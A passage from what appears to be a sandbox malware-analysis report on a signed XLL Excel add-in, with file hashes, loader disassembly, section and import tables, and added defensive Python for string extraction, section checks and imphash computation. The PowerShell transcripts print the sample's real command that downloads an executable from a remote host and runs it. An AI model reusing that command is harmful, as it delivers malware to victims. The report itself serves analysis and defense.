                                                                                                                                                  SHA-512:2887822470F0F2C21FC08F7DF3EBEBF873E9844C62F5666A66D43D1345E003BCB6A8CDDFDAC42ADA6C34C750092E2190F2B5460E531382E1604493FD6E4BA6A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: @...e.......................7.(.k.....].7............@..........H...............<@.^.L."My...:D..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)R.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].2.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021oib5j.5er.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33lmhbcg.erz.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5bzl405.f5n.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m31y4pff.piz.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.0syxhOX+.20210708163014.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1205
                                                                                                                                                  Entropy (8bit):5.311205245712001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSA5xvBnnDx2DOXUWTLST1lDPWKHjeTKKjX4CIym1ZJXgrLST1lDRnxSAZ0:BZLvhDoOXu1cKqDYB1ZUu1vZZ0
                                                                                                                                                  MD5:45D933EF1A814178B4C30D1C511EEA62
                                                                                                                                                  SHA1:92AB0E5235A9C4FED5941154906879B3C51F8FD2
                                                                                                                                                  SHA-256:FF3092607FC1517161D2C45D1014A05475343498EEFC44C7C834FB81661D7688
                                                                                                                                                  SHA-512:16EE676884C815562AD21973E371EDB772514726DA50D1DDE806BA92A4335871DAF897D90A89FA8C5F963E4F34728716C4048EBDC763A8E419CEB7C67BF5B35F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163025..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'..Process ID: 5944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163026..**********************..PS>poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'....********
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.93l2YHGR.20210708163033.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1066
                                                                                                                                                  Entropy (8bit):5.2109369727717985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSADxvBnnDx2DOXUW4L1+WEHjeTKKjX4CIym1ZJXsNnxSAZNq:BZtvhDoOs1pEqDYB1ZOxZZNq
                                                                                                                                                  MD5:2DB1F1A4DD113B692007B7089DE7A226
                                                                                                                                                  SHA1:03920B9D36563DFB26E0408BD2A9DE9B8914F0FE
                                                                                                                                                  SHA-256:9815EE4EF24399DA60B77429BFB41E1D5BCDEB7B5FBA7DC2F4B9C442B7264215
                                                                                                                                                  SHA-512:A4788DA06C4FA30BD8302AF771B08EC605B72C06FA10A50671143E95DBD816D2264A9C5AE640B4783153F5A6A51413CC447CEEE15FE3EC1E8818F1DE2807B2BA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EX bYpASs -NOp -w 1 WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..Process ID: 5788..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163046..**********************..PS>WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..**********************..Command start time: 20210708163350..**********************..PS>$global:?..True..**********************..Windows PowerShell

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):6.069104587121557
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                  File name:0708_5355150121.xll
                                                                                                                                                  File size:24488
                                                                                                                                                  MD5:41e0318dfdb1c180a375a7efc712649e
                                                                                                                                                  SHA1:f0c230010c7b85544c25879d4daf74479360e1bc
                                                                                                                                                  SHA256:73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
                                                                                                                                                  SHA512:b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17
                                                                                                                                                  SSDEEP:384:Er7ozcN5pozcU7ZHW7pw0jGWdqFQv6HovAcdKhKAUgLysGpwKNsc8kYN5:ika52naz78+KKd81UgLJc8ks
                                                                                                                                                  File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......`...........!...I.....@......................................................9s....@.............................B..

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:80b6f2d2f6f6d2cc

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0xcd418fb
                                                                                                                                                  Entrypoint Section:.img
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0xcd40000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                  Time Stamp:0x60E5C2AB [Wed Jul 7 15:05:15 2021 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:1
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:1
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:1
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:8fc6d9b5f93578c52ec239ef6c29b5ac

                                                                                                                                                  Authenticode Signature

                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                                                                  Error Number:-2146762495
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 6/8/2021 5:00:00 PM 6/9/2022 4:59:59 PM
                                                                                                                                                  Subject Chain
                                                                                                                                                  • CN=Storeks LLC, O=Storeks LLC, L=Moscow, C=RU
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:D8E818AC7AC0DB90212FAB404C566D4C
                                                                                                                                                  Thumbprint SHA-1:91319E6A55BF0EF68DB8AFB31845AB961356175F
                                                                                                                                                  Thumbprint SHA-256:127B54C50D77A329A145B0A5686E2214D2ED40482C0375D0DE278BA4A135DEDE
                                                                                                                                                  Serial:1E5EFA53A14599CC82F56F0790E20B17

Entrypoint Preview

The PE entry point is a stub that returns TRUE at once (mov eax, 1; retn 0Ch, the three-argument DllMain convention), so nothing happens at DLL load itself; the exported xlAutoOpen (see Exports) is what Excel calls when it loads the add-in. The code listed after the stub is a hand-written loader built on the call-over-string idiom: each call skips a NUL-terminated string and thereby leaves a pointer to that string on the stack for the callee. The strings the disassembler renders as the junk instructions below are "kernel32" (UTF-16), then "LoadLibraryW", "GetProcAddress" and "ExpandEnvironmentStringsW" (ASCII); the push 104h / lea edx, [esp+1010h] / push edx sequence sets up a MAX_PATH-sized stack buffer for ExpandEnvironmentStringsW, and the UTF-16 string that follows it begins "%PUBLIC%\". The preview is too short to recover the rest of that path.

Instruction
mov eax, 00000001h
retn 000Ch
sub esp, 00001254h
call 00007FBDDC907867h
imul eax, dword ptr [eax], 65h
add byte ptr [edx+00h], dh
outsb
add byte ptr [ebp+00h], ah
insb
add byte ptr [ebx], dh
add byte ptr [edx], dh
add byte ptr [eax], al
add al, ch
sti
add al, byte ptr [eax]
add byte ptr [ecx+000DE8C3h], cl
add byte ptr [eax], al
dec esp
outsd
popad
dec esp
imul esp, dword ptr [edx+72h], 57797261h
add byte ptr [ebx-18h], dl
pop edx
add eax, dword ptr [eax]
add byte ptr [ecx+000FE8C7h], cl
add byte ptr [eax], al
inc edi
je 00007FBDDC9078A3h
jc 00007FBDDC9078C1h
arpl word ptr [ecx+64h], ax
jc 00007FBDDC9078B8h
jnc 00007FBDDC9078C5h
add byte ptr [ebx-18h], dl
add eax, dword ptr [eax]
add byte ptr [ecx+001AE8C6h], cl
add byte ptr [eax], al
inc ebp
js 00007FBDDC9078C2h
popad
outsb
inc ebp
outsb
jbe 00007FBDDC9078BBh
jc 00007FBDDC9078C1h
outsb
insd
outsb
je 00007FBDDC9078A5h
je 00007FBDDC9078C4h
imul ebp, dword ptr [esi+67h], 53005773h
call esi
push 00000104h
lea edx, dword ptr [esp+00001010h]
push edx
call 00007FBDDC90787Bh
and eax, 55005000h
add byte ptr [edx+00h], al
dec esp
add byte ptr [ecx+00h], cl
inc ebx
add byte ptr [72005C00h], ah
add byte ptr [ebp+00h], ah
jnc 00007FBDDC907852h
xor eax, dword ptr [eax]
xor al, byte ptr [eax]
add byte ptr [eax+00h], ch
je 00007FBDDC907852h
popad
add byte ptr [eax], al
add bh, bh
shr al, 1
or al, 00h
add byte ptr [eax], al
inc ebx
jc 00007FBDDC9078B7h
popad
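
The script below is an added illustration, not part of the report and not the sample's own code: it recovers embedded strings from a raw code blob by looking for the call-over-string idiom seen in the listing above, that is a call rel32 whose target lies a short distance ahead and whose skipped bytes form exactly one NUL-terminated ASCII or UTF-16LE string. The input blob is constructed from the Entrypoint Preview (the DllMain stub, the sub esp prologue and the four strings); the two long calls into the rest of the loader are reproduced only as negative cases, and nothing else about the sample's code is reproduced.

```python
import string
import struct

# Printable ASCII without control whitespace; space and punctuation are allowed.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def _ascii_string(buf: bytes):
    """Return the text if buf is exactly one NUL-terminated printable ASCII string."""
    if len(buf) < 2 or buf[-1] != 0:
        return None
    body = buf[:-1]
    return body.decode("ascii") if all(b in PRINTABLE for b in body) else None


def _utf16_string(buf: bytes):
    """Return the text if buf is exactly one NUL-terminated printable UTF-16LE string."""
    if len(buf) < 4 or len(buf) % 2 or buf[-2:] != b"\x00\x00":
        return None
    body = buf[:-2]
    if all(body[i + 1] == 0 and body[i] in PRINTABLE for i in range(0, len(body), 2)):
        return body.decode("utf-16-le")
    return None


def find_call_over_strings(code: bytes, max_len: int = 0x200):
    """Find E8 <rel32> instructions whose target skips a NUL-terminated string.

    The idiom is: call forward by n bytes, n bytes of string data; the callee pops
    the return address and so receives a pointer to the string. The string must
    fill the skipped range exactly, which keeps ordinary calls from matching.
    Returns a list of (offset_of_call, encoding, text).
    """
    hits = []
    i = 0
    while i + 5 <= len(code):
        if code[i] == 0xE8:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            start = i + 5
            if 0 < rel <= max_len and start + rel <= len(code):
                blob = code[start:start + rel]
                text, enc = _ascii_string(blob), "ascii"
                if text is None:
                    text, enc = _utf16_string(blob), "utf-16-le"
                if text is not None:
                    hits.append((i, enc, text))
                    i = start + rel      # resume after the string
                    continue
        i += 1
    return hits


def call_over(s: str, enc: str = "ascii") -> bytes:
    """Build 'E8 <len> <string> NUL'; used only to assemble the constructed sample."""
    data = (s + "\x00").encode(enc)
    return b"\xE8" + struct.pack("<i", len(data)) + data


# Constructed sample re-encoding the sequence in the Entrypoint Preview. The two
# long calls are kept with their displacements as negative cases; the code they
# reach is not reproduced.
SAMPLE = (
    b"\xB8\x01\x00\x00\x00"            # mov eax, 1
    b"\xC2\x0C\x00"                    # retn 0Ch
    b"\x81\xEC\x54\x12\x00\x00"        # sub esp, 1254h
    + call_over("kernel32", "utf-16-le")
    + b"\xE8\xFB\x02\x00\x00"          # call +2FBh (a real call, no string)
    + b"\x89\xC3"                      # mov ebx, eax
    + call_over("LoadLibraryW")
    + b"\x53"                          # push ebx
    + b"\xE8\x5A\x03\x00\x00"          # call +35Ah (a real call, no string)
    + b"\x89\xC7"                      # mov edi, eax
    + call_over("GetProcAddress")
    + b"\x53"                          # push ebx
    + call_over("ExpandEnvironmentStringsW")
    + b"\x53\xFF\xD6"                  # push ebx; call esi
)

if __name__ == "__main__":
    for off, enc, text in find_call_over_strings(SAMPLE):
        print(f"+{off:#06x}  {enc:<9}  {text!r}")
```

Run against a dumped code section (for instance the .img bytes) the same function lists every string the loader pushes this way, in the order the code uses them, which is a quicker route to its API names than reading the mis-disassembled bytes.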

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x9000           0x42          .edata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1000           0xf05         .img
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x4600           0x19a8
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0x8           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

The SECURITY entry holds the Authenticode signature blob (0x19a8 bytes); it is the one directory whose address field is a raw file offset rather than an RVA, which is why it maps to no section. The IAT entry is empty although an import directory is declared, and that import directory has the same RVA and size as the whole .img section.

Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.img      0x1000           0xf05         0xe00     False     0.495256696429   data       5.15354590708    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.ico      0x2000           0x1000        0x1000    False     0.122802734375   data       1.29754900082    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fyjrtr   0x3000           0x1000        0x1000    False     0.566650390625   data       5.36518457685    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rytkrer  0x4000           0x1000        0x1000    False     0.767822265625   data       6.70050253557    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reyery   0x5000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.txt      0x6000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0x7000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.res      0x8000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.edata    0x9000           0x42          0x200     False     0.103515625      data       0.543966493249   IMAGE_SCN_MEM_READ
.reloc    0xa000           0x8           0x200     False     0.03515625       data       0.0203931352361  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Only .img is executable, and apart from .data, .edata and .reloc none of the section names is one a compiler or linker would emit. Four sections (.reyery, .txt, .data, .res) occupy no bytes on disk (raw size 0) yet are mapped with 0x200 bytes each, and .img is mapped larger (0xf05) than its raw data (0xe00).
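
As an added example (not part of the report), the parser below reads raw IMAGE_SECTION_HEADER entries, decodes the Characteristics bits into the flag names used in the table, computes per-section Shannon entropy from the file bytes and applies the checks an analyst would run on a layout like this one: executable sections with non-standard names, sections with no on-disk bytes, virtual size larger than raw size, and writable-plus-executable. The three headers in the constructed sample carry the addresses, sizes and flags of .img, .reyery and .reloc from the table; the bytes behind them are synthetic (a repeating 0..255 ramp and zeros), so the entropies are not the report's.

```python
import math
import struct
from collections import Counter

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")

CHARACTERISTICS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names ordinary compilers and linkers emit; anything else deserves a look.
COMMON_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".gfids"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def flag_names(characteristics: int) -> list:
    return [name for bit, name in CHARACTERISTICS.items() if characteristics & bit]


def parse_section_table(table: bytes, file_data: bytes, count: int) -> list:
    """Decode `count` section headers and attach entropy plus heuristic findings."""
    sections = []
    for idx in range(count):
        (name, vsize, vaddr, rawsize, rawptr,
         _relocs, _lines, _nrelocs, _nlines, chars) = \
            SECTION_HEADER.unpack_from(table, idx * SECTION_HEADER.size)
        name = name.rstrip(b"\x00").decode("ascii", "replace")
        raw = file_data[rawptr:rawptr + rawsize] if rawsize else b""
        findings = []
        if chars & IMAGE_SCN_MEM_EXECUTE and name not in COMMON_NAMES:
            findings.append("executable section with non-standard name")
        if rawsize == 0 and vsize:
            findings.append("no bytes on disk but mapped at runtime")
        if rawsize and vsize > rawsize:
            findings.append("virtual size exceeds raw size (zero-filled tail)")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append("writable and executable")
        sections.append({
            "name": name, "vaddr": vaddr, "vsize": vsize, "rawsize": rawsize,
            "entropy": round(shannon_entropy(raw), 3),
            "flags": flag_names(chars), "findings": findings,
        })
    return sections


def _hdr(name: bytes, vsize, vaddr, rawsize, rawptr, chars) -> bytes:
    return SECTION_HEADER.pack(name.ljust(8, b"\x00"), vsize, vaddr,
                               rawsize, rawptr, 0, 0, 0, 0, chars)


# Constructed sample: addresses, sizes and flags of .img, .reyery and .reloc
# from the Sections table; the bytes behind them are synthetic, not the file's.
SAMPLE_TABLE = (
    _hdr(b".img",    0xF05, 0x1000, 0xE00, 0x400,  0x60000060)
    + _hdr(b".reyery", 0x200, 0x5000, 0x000, 0x000,  0x400000C0)
    + _hdr(b".reloc",  0x008, 0xA000, 0x200, 0x1200, 0x42000040)
)
SAMPLE_FILE = b"\x00" * 0x400 + bytes(range(256)) * 14 + b"\x00" * 0x200

if __name__ == "__main__":
    for s in parse_section_table(SAMPLE_TABLE, SAMPLE_FILE, 3):
        print(f"{s['name']:<8} va={s['vaddr']:#07x} vs={s['vsize']:#05x} "
              f"raw={s['rawsize']:#05x} H={s['entropy']:.3f} {', '.join(s['flags'])}")
        for finding in s["findings"]:
            print(f"    ! {finding}")
```

On a real file the table offset is IMAGE_NT_HEADERS + 4 + sizeof(IMAGE_FILE_HEADER) + SizeOfOptionalHeader and `count` is FileHeader.NumberOfSections; the entropy check is most useful when compared across sections, since a single packed payload usually shows up as one section near 8 bits per byte.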

Imports

DLL           Import
msvbvm60.dll  __vbaLateIdSt, __vbaBoolVar, rtcStringBstr, rtcRightTrimBstr, rtcEndOfFile, __vbaBoolVarNull, __vbaNextEachCollObj, rtcAbsVar, TipCreateInstanceEx, __vbaDerefAry1, __vbaFpUI1, rtcKillFiles, __vbaVarCmpLt, SetMemObj, __vbaForEachVar, BASIC_CLASS_QueryInterface, rtcEnvironBstr, EbLibraryLoad, Zombie_QueryInterface, rtR4FromErrVar, rtcMakeDir, VarPtr, PutMem2, rtcGetTimeValue, rtcPackDate, rtcCommandVar
kernel32.dll  FindAtomA, SetFileApisToANSI, SetFileAttributesA, LockResource, lstrcmpiW, FreeEnvironmentStringsW, VirtualFree, SetMailslotInfo, EnumSystemLocalesA, ScrollConsoleScreenBufferA, GetConsoleCommandHistoryA, GlobalUnlock, GetSystemDirectoryW, FatalExit, _lopen, DisableThreadLibraryCalls, WaitForSingleObject, PostQueuedCompletionStatus, InvalidateConsoleDIBits, CreateDirectoryExA, lstrcmpA, LocalFlags, GetFileInformationByHandle, BeginUpdateResourceA, GetVDMCurrentDirectories, SetFileAttributesW, CreateSemaphoreW, ReadConsoleOutputAttribute
oleaut32.dll  VarR4FromDisp, CreateStdDispatch, VarDateFromUI8, OleSavePictureFile, VarI2FromDisp, VarR8FromUI2, SysStringLen, VarDecFromUI2, VarR4FromUI8, SafeArrayCopyData, LPSAFEARRAY_Marshal, DispGetIDsOfNames, SafeArrayGetLBound, VarBstrFromR8, VarI2FromDec, GetRecordInfoFromGuids, VarBstrFromUI1, VarUI2FromI2, VarTokenizeFormatString
tapi32.dll    lineCreateAgentSessionA, lineSetMediaControl, MMCGetAvailableProviders, lineNegotiateAPIVersion, lineDialA, lineDrop

This is a Visual Basic 6 style import table (msvbvm60.dll) padded with an unusual assortment of kernel32, oleaut32 and tapi32 functions, none of which are the APIs a loader needs, while the entry-point code carries the strings "kernel32", "LoadLibraryW" and "GetProcAddress" and resolves what it actually uses at runtime. The static import list is therefore a poor guide to behaviour; it is still worth hashing, because a generated table like this tends to be reused across a campaign's builds.
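
The block below, an added example rather than part of the report, shows how an import hash (imphash) is derived from an import list such as this one, following the convention pefile popularised: library name lower-cased with a .dll/.ocx/.sys extension removed, function names lower-cased, entries joined with commas in import-directory order and MD5-hashed. The list is copied from the table above in table order; whether that equals the on-disk import directory order is not stated by the report, and imports by ordinal are not handled here, so the printed digest matches the file's imphash only if both conditions hold.

```python
import hashlib

# Imports as listed in the Imports table, in table order (constructed input).
SAMPLE_IMPORTS = {
    "msvbvm60.dll": [
        "__vbaLateIdSt", "__vbaBoolVar", "rtcStringBstr", "rtcRightTrimBstr",
        "rtcEndOfFile", "__vbaBoolVarNull", "__vbaNextEachCollObj", "rtcAbsVar",
        "TipCreateInstanceEx", "__vbaDerefAry1", "__vbaFpUI1", "rtcKillFiles",
        "__vbaVarCmpLt", "SetMemObj", "__vbaForEachVar", "BASIC_CLASS_QueryInterface",
        "rtcEnvironBstr", "EbLibraryLoad", "Zombie_QueryInterface", "rtR4FromErrVar",
        "rtcMakeDir", "VarPtr", "PutMem2", "rtcGetTimeValue", "rtcPackDate",
        "rtcCommandVar",
    ],
    "kernel32.dll": [
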